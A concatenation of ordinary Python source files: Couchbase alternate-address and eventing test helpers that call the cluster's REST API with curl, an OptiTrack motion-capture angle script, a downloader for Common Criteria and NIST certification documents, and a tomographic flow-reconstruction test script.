                        .format(e.output))
            else:
                self.log.info("Error is expected due to alt addre not set yet")
""" param: default_bucket=False """
def n1ql_query(self, server_IP = None, client_os = "linux",
               create_travel_sample_bucket=False):
    """Run a N1QL query against travel-sample with the local cbq binary,
    to verify query access through the alternate address.

    :param server_IP: IP the cbq engine connects to; defaults to master's IP.
    :param client_os: "linux" or "mac" -- selects the local cbq path.
    :param create_travel_sample_bucket: forwarded to the bucket helper.

    NOTE(review): _create_travel_sample_bucket is called here with an IP
    string and a keyword argument that the helper defined below does not
    accept -- confirm which helper signature is intended.
    """
    if server_IP is None:
        server_IP = self.master.ip
    self._create_travel_sample_bucket(server_IP,
               create_travel_sample_bucket=create_travel_sample_bucket)
    base_path = "/opt/couchbase/bin/"
    query_cmd = 'SELECT country FROM `travel-sample` WHERE name = "Excel Airways";'
    if client_os == "mac":
        base_path = "/Applications/Couchbase\ Server.app/Contents/Resources/couchbase-core/bin/"
    loader_path = "{0}cbq{1}".format(base_path, self.cmd_ext)
    cmd_load = " -u Administrator -p password -e {0} -s '{1}'"\
        .format(server_IP, query_cmd)
    error_mesg = "No alternate address information found"  # NOTE(review): unused local
    try:
        self.log.info("Run query on travel-sample bucket from outside network")
        output = check_output("{0} {1}".format(loader_path, cmd_load), shell=True, stderr=STDOUT)
        if output:
            self.log.info("Output from n1ql query: {0}".format(output))
            if self.all_alt_addr_set:
                # Alternate addresses configured: scan the output for the
                # known failure markers.
                if "No alternate address information found" in str(output):
                    self.fail("Failed to set alternate address.")
                elif "Error" in str(output):
                    self.fail("Failed to find query node in port 8091.")
                else:
                    # NOTE(review): this branch also fires on apparently
                    # clean query output -- confirm intended nesting.
                    self.fail("Failed to run query in remote cluster.{0}"\
                        .format(output))
            else:
                self.log.info("Error is expected due to alt addre not set yet")
    except CalledProcessError as e:
        if e.output:
            if self.all_alt_addr_set:
                if "No alternate address information found" in e.output:
                    self.fail("Failed to set alternate address.")
                else:
                    self.fail("Failed to run query in remote cluster.{0}"\
                        .format(e.output))
            else:
                self.log.info("Error is expected due to alt addre not set yet")
def create_eventing_function(self, server = None, client_os = "linux",
                             create_travel_sample_bucket=False):
    """End-to-end eventing check through the alternate address: create two
    buckets plus travel-sample, then create / deploy / verify / undeploy /
    delete the "eventingalt" eventing function.

    Bug fix: when server was None, only a local IP variable was defaulted
    while the None server object was still passed to helpers that
    dereference server.ip (AttributeError); server itself is now
    defaulted to self.master.  Unused locals (query_cmd, rest, base_path)
    were removed.
    """
    if server is None:
        server = self.master
    self._create_buckets(server, num_buckets=2)
    self._create_travel_sample_bucket(server)
    try:
        self.log.info("Create event eventingalt from outside network")
        self._create_eventing_function(server)
        self._deploy_function(server)
        self._check_eventing_status(server)
        self._undeploy_eventing_function(server)
        self._delete_eventing_function(server)
    except CalledProcessError as e:
        if e.output:
            if self.all_alt_addr_set:
                # Alternate addresses configured: any failure is real.
                if "No alternate address information found" in e.output:
                    self.fail("Failed to set alternate address.")
                else:
                    self.fail("Failed to run query in remote cluster.{0}"\
                        .format(e.output))
            else:
                self.log.info("Error is expected due to alt addre not set yet")
def _create_travel_sample_bucket(self, server, create_travel_sample_bucket=True):
    """Install the travel-sample bucket via the REST sample-bucket API.

    Backward-compatible fixes:
      * accepts the create_travel_sample_bucket keyword that n1ql_query
        already passes (previously a TypeError); when False the call is a
        no-op;
      * accepts either a server object or a bare IP string (n1ql_query
        passes an IP); the vbucket readiness check is only possible when
        a server object is available.
    """
    if not create_travel_sample_bucket:
        return
    server_ip = server.ip if hasattr(server, "ip") else server
    self.log.info("Create travel-sample bucket")
    create_bucket_cmd = """curl -g -u Administrator:password \
        http://{0}:8091/sampleBuckets/install \
        -d '["travel-sample"]'""".format(server_ip)
    output = check_output("{0}".format(create_bucket_cmd), shell=True,
                          stderr=STDOUT)
    if hasattr(server, "ip"):
        # RestConnection needs a full server object, not an IP string.
        ready = RestHelper(RestConnection(server)).vbucket_map_ready("travel-sample")
    if output:
        self.log.info("Output from create travel-sample bucket: {0}"
                      .format(output))
    self.sleep(25, "time to load and create indexes")
def _create_buckets(self, server, num_buckets=1):
    """Create num_buckets buckets named bucket_1..bucket_N over REST.

    Each bucket gets a 256MB quota and one replica.  In the multi-bucket
    path each bucket is verified with vbucket_map_ready before creating
    the next one; the single-bucket path performs no readiness check.
    """
    if server is None:
        server = self.master
    create_bucket_command = """ curl -g -u Administrator:password \
        http://{0}:8091/pools/default/buckets \
        -d ramQuotaMB=256 -d authType=sasl -d replicaNumber=1 """.format(server.ip)
    if num_buckets == 1:
        self.log.info("Create bucket {0} ".format("bucket_1"))
        create_bucket_command += " -d name=bucket_1 "
        output = check_output("{0}".format(create_bucket_command), shell=True,
                              stderr=STDOUT)
        if output:
            self.log.info("Output from create bucket bucket_1")
    if num_buckets > 1:
        count = 1
        while count <= num_buckets:
            bucket_name = "bucket_{0}".format(count)
            self.log.info("Create bucket {0}".format(bucket_name))
            # Re-use the base command; each bucket only differs by name.
            create_bucket = create_bucket_command
            create_bucket += " -d name={0} ".format(bucket_name)
            # Python 2 print statement -- this module predates Python 3.
            print "\ncreate bucket command: ", create_bucket
            output = check_output("{0}".format(create_bucket), shell=True,
                                  stderr=STDOUT)
            if output:
                self.log.info("Output from create bucket {0}".format(bucket_name))
            ready = RestHelper(RestConnection(server)).vbucket_map_ready(bucket_name)
            if not ready:
                self.fail("Could not create bucket {0}".format(bucket_name))
            count += 1
            self.sleep(5)
def _create_default_bucket(self, server):
    """Create the "default" bucket (256MB quota, one replica) over REST."""
    target = self.master if server is None else server
    curl_cmd = """ curl -g -u Administrator:password \
        http://{0}:8091/pools/default/buckets -d name=default \
        -d ramQuotaMB=256 -d authType=sasl -d replicaNumber=1 """.format(target.ip)
    self.log.info("Create default bucket ")
    result = check_output(curl_cmd, shell=True, stderr=STDOUT)
    if result:
        self.log.info("Output from create bucket default {0}".format(result))
def _create_eventing_function(self, server):
    """Create the "eventingalt" eventing function via the eventing REST
    API on port 8096.

    The function definition (hand-built JSON) copies documents from
    travel-sample into bucket_2 (aliased "travelalt") with bucket_1 as
    the metadata bucket, and is created undeployed.  Fails the test when
    the service does not report the function as stored.
    """
    eventing_name = "eventingalt"
    # Function definition assembled piecewise; keep the embedded JSON
    # quoting/escaping exactly as-is -- it is shell-quoted below.
    function_body = ' {"depcfg":{"buckets":[{"alias":"travelalt","bucket_name":"bucket_2", "access":"rw"}],"metadata_bucket":"bucket_1","source_bucket":"travel-sample", '
    function_body += ' "curl":[]},"settings":{"worker_count":3,"execution_timeout":60, "user_prefix":"eventing","log_level":"INFO","dcp_stream_boundary":"everything", '
    function_body += ' "processing_status":false,"deployment_status":false,"description":"", "deadline_timeout":62}, '
    function_body += '"appname":"{0}", '.format(eventing_name)
    function_body += """ "appcode":"function OnUpdate(doc, meta) {\\n travelalt[meta.id]=doc\\n log('docId', meta.id);\\n}\\nfunction OnDelete(meta) {\\n}", """
    function_body += ' "status":"undeployed","uiState":"inactive"} '
    cmd = "curl -g -u Administrator:password http://{0}:8096/api/v1/functions/{1} -d \'{2}\'"\
        .format(server.ip, eventing_name, function_body)
    output = check_output(cmd, shell=True, stderr=STDOUT)
    """ Correct output from command line
    {
        "code": 0,
        "info": {
            "status": "Stored function: 'eventingalt' in metakv",
            "warnings": null
        }
    }
    """
    if "Stored function: 'eventingalt' " not in str(output):
        self.fail("Fail to create eventing function")
def _deploy_function(self, server):
    """Deploy the "eventingalt" eventing function and wait for it to start."""
    settings_url = "curl -u Administrator:password http://{0}:8096/api/v1/functions/{1}/settings"\
        .format(server.ip, "eventingalt")
    payload = """ -d '{"deployment_status":true,"processing_status":true}' """
    output = check_output(settings_url + payload, shell=True, stderr=STDOUT)
    self.sleep(60, "wait for function deployed")
def _check_eventing_status(self, server):
    """Return True when the "eventingalt" function reports deployed.

    Bug fix: the previous command was "curl GET <url>" -- curl treats the
    bare word GET as an extra URL (yielding "Could not resolve host:
    GET"); an explicit "-X GET" request option is used instead.
    """
    eventing_name = "eventingalt"
    cmd = "curl -X GET -u Administrator:password http://{0}:8096/api/v1/functions/{1}/settings"\
        .format(server.ip, eventing_name)
    output = check_output(cmd, shell=True, stderr=STDOUT)
    return '"deployment_status": true' in str(output)
def _undeploy_eventing_function(self, server):
    """Undeploy the "eventingalt" eventing function and wait for it to stop."""
    settings_url = "curl -u Administrator:password http://{0}:8096/api/v1/functions/{1}/settings"\
        .format(server.ip, "eventingalt")
    payload = """ -d '{"deployment_status":false,"processing_status":false}' """
    output = check_output(settings_url + payload, shell=True, stderr=STDOUT)
    self.sleep(20, "wait to undeploy function")
def _delete_eventing_function(self, server):
    """Delete the "eventingalt" eventing function; True when accepted.

    Bug fix: the DELETE URL previously ended at .../functions/ with no
    function name, targeting the whole functions collection, while the
    success message checked below is the one returned for deleting the
    single "eventingalt" function; the name is now appended to the URL.
    """
    eventing_name = "eventingalt"
    cmd = " curl -X DELETE -u Administrator:password http://{0}:8096/api/v1/functions/{1}"\
        .format(server.ip, eventing_name)
    output = check_output(cmd, shell=True, stderr=STDOUT)
    return 'Function: eventingalt deleting in the background' in str(output)
|
<reponame>humancomputerintegration/dextrEMS<gh_stars>1-10
#Copyright © 2018 Naturalpoint
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
#http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
# OptiTrack NatNet direct depacketization sample for Python 3.x
#
# Uses the Python NatNetClient.py library to establish a connection (by creating a NatNetClient),
# and receive data via a NatNet connection and decode it using the NatNetClient library.
from NatNetClient import NatNetClient
import time
import math
# hand_attitude, hand_heading, hand_bank
# finger_attitude, finger_heading, finger_bank
def quaternion_to_euler(qx, qy, qz, qw):
    """Convert a quaternion (qx, qy, qz, qw) to Euler angles in degrees.

    Returns [attitude, heading, bank].  Equation from
    http://www.euclideanspace.com/maths/geometry/rotations/conversions/quaternionToEuler/
    """
    attitude = math.asin(2*qx*qy + 2*qz*qw)
    heading = math.atan2(2*qy*qw-2*qx*qz , 1 - 2*qy**2 - 2*qz**2)
    bank = math.atan2(2*qx*qw-2*qy*qz , 1 - 2*qx**2 - 2*qz**2)
    # TODO: may need sign flips to deal with a left-handed coordinate system.
    deg = math.degrees
    return [deg(attitude), deg(heading), deg(bank)]
# This is a callback function that gets connected to the NatNet client and called once per mocap frame.
# def receiveNewFrame( frameNumber, markerSetCount, unlabeledMarkersCount, rigidBodyCount, skeletonCount,
# labeledMarkerCount, timecode, timecodeSub, timestamp, isRecording, trackedModelsChanged ):
# print( "Received frame", frameNumber )
# This is a callback function that gets connected to the NatNet client. It is called once per rigid body per frame
def receiveRigidBodyFrame( id, position, rotation ):
    """NatNet per-rigid-body callback: update the global Euler angles.

    Rigid body 2 is the hand, rigid body 3 is the finger; any other id is
    ignored.  `rotation` is a quaternion (qx, qy, qz, qw).
    """
    global hand_attitude, hand_heading, hand_bank
    global finger_attitude, finger_heading, finger_bank
    if id == 2:
        hand_attitude, hand_heading, hand_bank = quaternion_to_euler(*rotation)
    elif id == 3:
        finger_attitude, finger_heading, finger_bank = quaternion_to_euler(*rotation)
# ---- Streaming setup ----
# This will create a new NatNet client
streamingClient = NatNetClient()
# Configure the streaming client to call our rigid body handler on the emulator to send data out.
# The per-frame callback is intentionally disabled.
streamingClient.newFrameListener = None #receiveNewFrame
streamingClient.rigidBodyListener = receiveRigidBodyFrame
# Start up the streaming client now that the callbacks are set up.
# This will run perpetually, and operate on a separate thread.
streamingClient.run()
set_offset = False
count = 0
# zero delta angle
# temp = input("press any key to zero the delta angle")
# hand_attitude_off, hand_heading_off, hand_bank_off = hand_attitude, hand_heading, hand_bank
# finger_attitude_off, finger_heading_off, finger_bank_off = finger_attitude, finger_heading, finger_bank
# Initial pose angles; overwritten by receiveRigidBodyFrame on the NatNet
# thread as frames arrive (shared module globals, no locking).
hand_attitude, hand_heading, hand_bank = 0, 0, 0
finger_attitude, finger_heading, finger_bank = 0, 0, 0
del_attitude_offset = 0
del_heading_offset = 0
del_bank_offset = 0
hand_heading_off = 0
finger_heading_off = 0
# ---- Main polling loop: print the finger/hand heading difference ----
while True:
    # del_attitude = abs( abs(finger_attitude - hand_attitude_off) - abs(hand_attitude - hand_attitude_off))
    # del_heading = abs( abs(finger_heading - finger_heading_off) - abs(hand_heading - hand_heading_off))
    # del_bank = abs( abs(finger_bank - finger_bank_off) - abs(hand_bank - hand_bank_off))
    del_attitude = abs(finger_attitude - hand_attitude )
    del_heading = abs(finger_heading - hand_heading )
    del_bank = abs(finger_bank - hand_bank )
    # print("pre "
    # + str("{0:.2f}".format(del_attitude)) + " "
    # + str("{0:.2f}".format(del_heading)) + " "
    # + str("{0:.2f}".format(del_bank)))
    # On the second iteration (count == 1) capture the current headings as
    # zero offsets so later readings are relative to that pose.
    if set_offset == False and count == 1:
        # del_attitude_offset = del_attitude
        # del_heading_offset = del_heading
        # del_bank_offset = del_bank
        finger_heading_off = finger_heading
        hand_heading_off = hand_heading
        set_offset = True
        print("offset "
              + str("{0:.2f}".format(del_attitude_offset)) + " "
              + str("{0:.2f}".format(del_heading_offset)) + " "
              + str("{0:.2f}".format(del_bank_offset)))
    # The del_* offsets stay zero unless the commented lines above are enabled.
    del_attitude = del_attitude - del_attitude_offset
    del_heading = del_heading - del_heading_offset
    del_bank = del_bank - del_bank_offset
    # print("post "
    # + str("{0:.2f}".format(del_attitude)) + " "
    # + str("{0:.2f}".format(del_heading)) + " "
    # + str("{0:.2f}".format(del_bank)))
    hand_heading = hand_heading - hand_heading_off
    finger_heading = finger_heading - finger_heading_off
    print("post "
          + str("{0:.2f}".format(hand_heading)) + " "
          + str("{0:.2f}".format(finger_heading)) + " "
          + str("{0:.2f}".format(finger_heading - hand_heading)))
    count = count+1
time.sleep(0.01) |
import os
from multiprocessing.pool import ThreadPool
from pathlib import Path
from tqdm import tqdm
from typing import Sequence, Tuple, List
import requests
from sec_certs.files import search_files
CC_WEB_URL = 'https://www.commoncriteriaportal.org'
def download_file(url: str, output: Path, timeout: float = 60) -> int:
    """Download *url* into *output* and return the HTTP status code.

    Improvement: a request timeout (new backward-compatible keyword,
    default 60s) is applied so a stalled server cannot hang a download
    thread forever.  A failure to write the file is reported on stdout
    but the HTTP status is still returned, as before.
    """
    r = requests.get(url, allow_redirects=True, timeout=timeout)
    try:
        with open(output, "wb") as f:
            f.write(r.content)
    except (OSError, ConnectionError) as e:
        print('ERROR: Failed to download {} with {}'.format(url, e))
    return r.status_code
def download_parallel(items: Sequence[Tuple[str, Path]], num_threads: int) -> Sequence[Tuple[str, int]]:
    """Download (url, output_path) pairs on a thread pool with a progress bar.

    Returns a list of (url, status_code) in completion order.
    """
    def _fetch(pair):
        url, dest = pair
        return url, download_file(url, dest)

    pool = ThreadPool(num_threads)
    results = []
    with tqdm(total=len(items)) as bar:
        for outcome in pool.imap(_fetch, items):
            bar.update(1)
            results.append(outcome)
    pool.close()
    pool.join()
    return results
def download_cc_web(web_dir: Path, num_threads: int) -> Sequence[Tuple[str, int]]:
    """Download the Common Criteria portal overview pages and CSVs into web_dir."""
    # Output file name -> portal URL (insertion order preserved).
    pages = {
        "cc_products_active.html": "https://www.commoncriteriaportal.org/products/",
        "cc_products_archived.html": "https://www.commoncriteriaportal.org/products/index.cfm?archived=1",
        "cc_labs.html": "https://www.commoncriteriaportal.org/labs/",
        "cc_products_active.csv": "https://www.commoncriteriaportal.org/products/certified_products.csv",
        "cc_products_archived.csv": "https://www.commoncriteriaportal.org/products/certified_products-archived.csv",
        "cc_pp_active.html": "https://www.commoncriteriaportal.org/pps/",
        "cc_pp_collaborative.html": "https://www.commoncriteriaportal.org/pps/collaborativePP.cfm?cpp=1",
        "cc_pp_archived.html": "https://www.commoncriteriaportal.org/pps/index.cfm?archived=1",
        "cc_pp_active.csv": "https://www.commoncriteriaportal.org/pps/pps.csv",
        "cc_pp_archived.csv": "https://www.commoncriteriaportal.org/pps/pps-archived.csv",
    }
    items = [(url, web_dir / name) for name, url in pages.items()]
    return download_parallel(items, num_threads)
def download_cc(walk_dir: Path, cert_list, num_threads: int) -> Sequence[Tuple[str, int]]:
    """Download certification reports and security targets from cert_list.

    Each entry of cert_list is (report_url, report_name[, st_url, st_name]);
    URLs not already containing CC_WEB_URL are resolved against it.

    Bug fix: the security-target guard used to test ``len(cert) > 2``
    while indexing ``cert[3]``, raising IndexError for 3-element entries;
    it now requires ``len(cert) > 3``.
    """
    def _resolve(url: str) -> str:
        # Keep absolute portal URLs; prefix relative paths with the portal root.
        return url if url.find(CC_WEB_URL) != -1 else CC_WEB_URL + url

    items = []
    for cert in cert_list:
        items.append((_resolve(cert[0]), walk_dir / "certs" / cert[1]))
        if len(cert) > 3 and cert[3] != "":
            items.append((_resolve(cert[2]), walk_dir / "targets" / cert[3]))
    return download_parallel(items, num_threads)
def download_cc_failed(walk_dir: Path, num_threads: int) -> Sequence[Tuple[str, int]]:
    """Re-download previously fetched CC documents that look truncated.

    Scans the certs/ and targets/ subfolders for .pdf/.doc/.docx files
    smaller than MIN_CORRECT_CERT_SIZE bytes and downloads them again
    from the portal's epfiles area, overwriting in place.
    """
    # obtain list of all downloaded pdf files and their size
    # check for pdf files with too small length
    # generate download script again (single one)
    # visit all relevant subfolders
    sub_folders = ['certs', 'targets']
    # the smallest correct certificate downloaded was 71kB, if server error occurred, it was only 1245 bytes
    # NOTE(review): the threshold below (5000 bytes) is far under the 71kB
    # quoted above -- confirm which limit is intended.
    MIN_CORRECT_CERT_SIZE = 5000
    download_again = []
    for sub_folder in sub_folders:
        target_dir = walk_dir / sub_folder
        # obtain list of all downloaded pdf files and their size
        files = search_files(target_dir)
        for file_name in files:
            # process only .pdf files
            if not os.path.isfile(file_name):
                continue
            file_ext = file_name[file_name.rfind('.'):].upper()
            if file_ext != '.PDF' and file_ext != '.DOC' and file_ext != '.DOCX':
                continue
            # obtain size of file
            file_size = os.path.getsize(file_name)
            if file_size < MIN_CORRECT_CERT_SIZE:
                # too small file, likely failed download - retry
                file_name_short = file_name[file_name.rfind(os.sep) + 1:]
                download_link = f'{CC_WEB_URL}/files/epfiles/{file_name_short}'
                download_again.append((download_link, file_name))
    return download_parallel(download_again, num_threads)
def download_fips_web(web_dir: Path):
    """Download the CMVP validated-modules search pages (active, historical,
    revoked) into web_dir."""
    url_template = ("https://csrc.nist.gov/projects/cryptographic-module-validation-program/"
                    "validated-modules/search?SearchMode=Advanced&CertificateStatus={}&ValidationYear=0")
    for status in ("Active", "Historical", "Revoked"):
        download_file(url_template.format(status),
                      web_dir / "fips_modules_{}.html".format(status.lower()))
def download_fips(web_dir: Path, policies_dir: Path, num_threads: int, ids: List[str]) \
        -> Tuple[Sequence[Tuple[str, int]], int]:
    """Download per-certificate CMVP pages and security-policy PDFs that are
    not yet on disk.

    Returns (responses, number_of_files_requested).
    """
    web_dir.mkdir(exist_ok=True)
    policies_dir.mkdir(exist_ok=True)
    items = []
    # Certificate detail pages first, then security-policy PDFs, skipping
    # anything already present (same order as before: all html, then pdf).
    for cert_id in ids:
        html_out = web_dir / f"{cert_id}.html"
        if not html_out.exists():
            items.append((f"https://csrc.nist.gov/projects/cryptographic-module-validation-program/certificate/{cert_id}",
                          html_out))
    for cert_id in ids:
        pdf_out = policies_dir / f"{cert_id}.pdf"
        if not pdf_out.exists():
            items.append((f"https://csrc.nist.gov/CSRC/media/projects/cryptographic-module-validation-program/documents/security-policies/140sp{cert_id}.pdf",
                          pdf_out))
    return download_parallel(items, num_threads), len(items)
|
<filename>sandbox/test_solver.py
import sys
import os
import numpy as np
import matplotlib.pyplot as plt
sys.path.insert(1, '/home/axel/workspace/contomo/')
import utils
from FVM import FiniteVolumes
from solver import FVMSolver
from sinogram_interpolator import SinogramSplineInterpolator
from basis import LinearTetraMeshBasis, TetraMesh
from analytical_phantom import AnalyticalPhantom
from projector import Projector
# ---- Load the phantom and the reference (astra) reconstructions ----
ap = AnalyticalPhantom.load('/home/axel/workspace/contomo/dem_inversion/dem_phantom')
N = ap.dynamic_sinograms[0].shape[0]
volume_shape = (N,N,N)
reference_projector = Projector( (N,N,N), N, N, ap.static_projection_angles[0] )
initial_volume = np.load('astra_recon_initial_volume.npy')
final_volume = np.load('astra_recon_final_volume.npy')
# The starting reconstruction must contain no negative densities.
assert np.sum(initial_volume<0)==0
projector = Projector( (N,N,N), N, N, ap.dynamic_projection_angles[0] )
current_volume = initial_volume.copy()
# ---- Spline interpolation of the measured sinograms over time ----
sample_times = np.array(ap.dynamic_sample_times)
sinograms = np.array(ap.dynamic_sinograms)
spline_interp = SinogramSplineInterpolator(sample_times, sinograms, smoothness=0, order=2)
spline_interp.save_state()
dt_sampling = (sample_times[1]-sample_times[0]) # time between two sinograms (assumed to be uniform)
nbr_of_substeps = 1 # number of integration steps between sample times
dt = dt_sampling/nbr_of_substeps # time between two integration steps
integration_times = np.arange(sample_times[0], sample_times[-3] + dt, dt)
volumes = [current_volume.copy()]
# Static and dynamic acquisitions must share their first angle/sinogram slice.
assert ap.static_projection_angles[0][0]==ap.dynamic_projection_angles[0][0]
assert np.linalg.norm( ap.static_sinograms[0][:,0,:] - sinograms[0,:,0,:] )==0
print('##############################################################################')
print(' R A Y M O D E L E R R O R ')
# Residual between the initial volume's projections and the first measured
# sinogram -- the irreducible error of the ray model itself.
ray_model_error = np.linalg.norm( projector.forward_project( initial_volume ) - sinograms[0])
print( ray_model_error )
print('##############################################################################')
# Define a finite basis for velocities.
dx = ap.pixel_size
esize = N/8.0
velocity_basis = TetraMesh()
velocity_basis.generate_mesh_from_numpy_array( np.ones((N,N,N),dtype=np.uint8), dx, max_cell_circumradius=esize*dx, max_facet_distance=esize*dx)
velocity_basis.expand_mesh_data()
print('Nelm: ',velocity_basis.enod.shape[0])
print('Nnods: ',velocity_basis.coord.shape[0])
velocity_basis.to_xdmf('dem_phantom_mesh')
# We define a scaled set of meshes to be used in the velocity recovery step
origin = (0,0,0)
dx_scaled = 1.0
scaled_flow_model = FiniteVolumes( origin, dx_scaled, current_volume.shape )
scaled_velocity_basis = TetraMesh()
scaled_velocity_basis.generate_mesh_from_numpy_array( np.ones((N,N,N),dtype=np.uint8), dx, max_cell_circumradius=esize*dx, max_facet_distance=esize*dx)
# Rescale mesh coordinates to unit voxel size (dimensionless coordinates).
scaled_velocity_basis.coord = scaled_velocity_basis.coord/dx
scaled_velocity_basis.nodal_coordinates = scaled_velocity_basis.nodal_coordinates/dx
scaled_velocity_basis.expand_mesh_data()
scaled_velocity_basis.to_xdmf('dem_scaled_phantom_mesh')
scaled_velocity_basis.coefficents = np.zeros( scaled_velocity_basis.nodal_coordinates.shape )
# Pre-render the basis at the +/- half-voxel offsets along each axis
# (labels xp/xn/yp/yn/zp/zn are read back in dydt below).
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi + scaled_flow_model.dx/2., scaled_flow_model.Yi, scaled_flow_model.Zi, label='xp' )
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi - scaled_flow_model.dx/2., scaled_flow_model.Yi, scaled_flow_model.Zi, label='xn' )
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi, scaled_flow_model.Yi + scaled_flow_model.dx/2., scaled_flow_model.Zi, label='yp' )
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi, scaled_flow_model.Yi - scaled_flow_model.dx/2., scaled_flow_model.Zi, label='yn' )
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi, scaled_flow_model.Yi, scaled_flow_model.Zi + scaled_flow_model.dx/2., label='zp' )
scaled_velocity_basis.precompute_basis( scaled_flow_model.Xi, scaled_flow_model.Yi, scaled_flow_model.Zi - scaled_flow_model.dx/2., label='zn' )
solver = FVMSolver( None, scaled_flow_model, projector, scaled_velocity_basis, None )
solver.x0 = np.zeros( scaled_velocity_basis.coefficents.shape )
solver.print_frequency = 1
res2_norm = np.inf
sinogram_residual_history = []
recon_times = []
#i=0
# ---- Time integration: per step, recover a velocity field explaining the
# sinogram time-derivative, then advect the density volume with it ----
for current_time in integration_times:
    #i+=1
    #if i==2: raise
    # Index of the sinogram sample this step integrates towards.
    current_time_indx = np.round( (current_time + dt)/dt_sampling ).astype(int)
    print(' ')
    print('############################## T A R G E T T I M E I N D E X : '+str((current_time + dt)/dt_sampling)+' (t='+str(current_time)+') ############################################')
    verbose = True
    def dydt(t,y):
        # Right-hand side for the density ODE: given state y at time t,
        # return d(density)/dt.  Uses the enclosing-scope solver, spline
        # interpolator and `verbose` flag (toggled around the Euler probe).
        # Interpolate measurements for target time; t interpolating with projections from the current state y.
        spline_interp.add_points( [t], [projector.forward_project( y )] , resolution = dt_sampling*1e-8 )
        dgdt = spline_interp( [t], derivative=1 )[0,:,:,:]
        spline_interp.reset()
        # Rescale units of the problem to give better numerical properties.
        dt_sampling_scaled = dt_sampling
        dgdt_scaled = dgdt*dt_sampling_scaled
        scaled_flow_model.fixate_density_field( y )
        # Nonlinear optimization step
        solver.density_field = y
        solver.second_member = -dgdt_scaled
        solver.iteration = 0
        solver.set_CFL_scaling_dimensions( (dx/dt_sampling_scaled)*dt/dx )
        #solver.set_cfl_constraint( solver.flow_model.dx, 1.0 )
        #solver.set_cfl_constraint( solver.flow_model.dx, 1.0, sensitivity_fix_threshold=0, verbose=True )
        #solver.check_jac(solver.x0.flatten())
        #solver.check_hessian(solver.x0.flatten())
        #solver.set_uniform_bounds( -(dx/dt_sampling_scaled)*dx/dt, (dx/dt_sampling_scaled)*dx/dt )
        # TODO: some more investioagtions of the convergence and the negative denseties
        # seems the hessian lsq solution is not perhaps the "right" solution to pick.
        # if CFL < 1 one would expect that no negative denseties would appear....
        solver.solve( maxiter=10, verbose=verbose, method='L-BFGS-B' )
        #solver.solve( maxiter=5, verbose=True, method='Builtin Newton' )
        # Warm-start the next solve from this solution.
        solver.x0 = solver.x
        print(' ')
        # Optimal velocity solution
        velocity_basis.coefficents = solver.x*(dx/dt_sampling_scaled) # add units
        #velocity_basis.coefficents = np.zeros( scaled_velocity_basis.coefficents.shape )
        #velocity_basis.coefficents[:,2] = 0.1
        fvm_propagator = FiniteVolumes( origin, dx, y.shape )
        # If the CFL is too large it makes sense to restart the iteration with a smaller dt.
        maxCFL = fvm_propagator.max_CFL(velocity_basis, y, dt)
        assert maxCFL<1, 'The reconstructed velocities lead to unfesible local CFL='+str(maxCFL)+'>1'
        # Render the recovered velocity at the pre-computed +/- face offsets
        # for each axis and hand the pairs to the FVM propagator.
        vertex_velocity = []
        negtags = ['xn','yn','zn']
        postags = ['xp','yp','zp']
        sx,sy,sz = y.shape
        for axis,(n,p) in enumerate( zip(negtags,postags) ):
            vn = scaled_velocity_basis.rendered_basis[n].T.dot( velocity_basis.coefficents[ :, axis ] ).reshape(sx-4,sy-4,sz-4)
            vp = scaled_velocity_basis.rendered_basis[p].T.dot( velocity_basis.coefficents[ :, axis ] ).reshape(sx-4,sy-4,sz-4)
            vertex_velocity.append( (vn, vp) )
        return fvm_propagator.get_dfbardt(vertex_velocity, y)
    old_TV = utils.get_total_variation(current_volume)
    old_mass = np.sum(current_volume)
    # Check that dt is strong stability preserving for a single forward euler step
    x0_copy = solver.x0.copy()
    verbose = False
    euler_volume = utils.euler_step(dydt, current_time, current_volume.copy(), dt)
    verbose = True
    # Restore the warm start consumed by the Euler probe above.
    solver.x0 = x0_copy
    euler_TV = utils.get_total_variation(euler_volume)
    #current_volume = utils.RK4_step(dydt, current_time, current_volume.copy(), dt)
    #current_volume = utils.RK3_step(dydt, current_time, current_volume.copy(), dt)
    current_volume = utils.TVD_RK3_step(dydt, current_time, current_volume.copy(), dt)
    #current_volume = utils.euler_step(dydt, current_time, current_volume.copy(), dt)
    current_TV = utils.get_total_variation(current_volume)
    current_mass = np.sum(current_volume)
    print('Euler TV diff = ', euler_TV - old_TV )
    print('TV diff = ', current_TV - old_TV )
    print('mass fraction diff = '+str(np.abs(current_mass - old_mass)/old_mass))
    print('min density = ', np.min(current_volume) )
    # assert that the total vartiation is diminished, the masss preserved and the denseties positive
    #assert current_TV - old_TV < 0, 'TV diff = '+str(current_TV - old_TV)
    #assert np.abs(current_mass - old_mass)/old_mass < 1e-4, 'mass fraction diff = '+str(np.abs(current_mass - old_mass)/old_mass)
    #assert np.sum(current_volume<-1e-8)==0, str(current_volume[current_volume<-1e-8].flatten())
    # When a measured sample time is reached, store the volume and report
    # the sinogram residual before/after this step.
    if current_time_indx!=0 and np.abs( current_time_indx - ((current_time+dt)/dt_sampling) ) < (dt/2.):
        volumes.append(current_volume.copy())
        res1 = projector.forward_project(volumes[-2]) - sinograms[current_time_indx]
        res2 = projector.forward_project(volumes[-1]) - sinograms[current_time_indx]
        res1_norm = np.linalg.norm(res1)
        res2_norm = np.linalg.norm(res2)
        print( 'Sino res before: ',res1_norm)
        print( 'Sino res after : ',res2_norm)
        print('(Inherent ray model error: ', ray_model_error,')')
        sinogram_residual_history.append( res2_norm )
        recon_times.append( current_time )
    print('#####################################################################################################################')
print(' ')
# ---- Final report and saving of reconstructed volumes/residuals ----
print('Final real space volume residual: ', np.linalg.norm(final_volume - current_volume))
print('to be compared to: ', np.linalg.norm(final_volume - initial_volume))
np.save( 'reconstructed_volumes/sinogram_residual_history.npy', np.array(sinogram_residual_history))
np.save( 'reconstructed_volumes/recon_times.npy', np.array(recon_times))
os.system('rm reconstructed_volumes/reconstructed_*')
for i,vol in enumerate(volumes):
    sino_res = np.abs( projector.forward_project( vol ) - sinograms[i] )
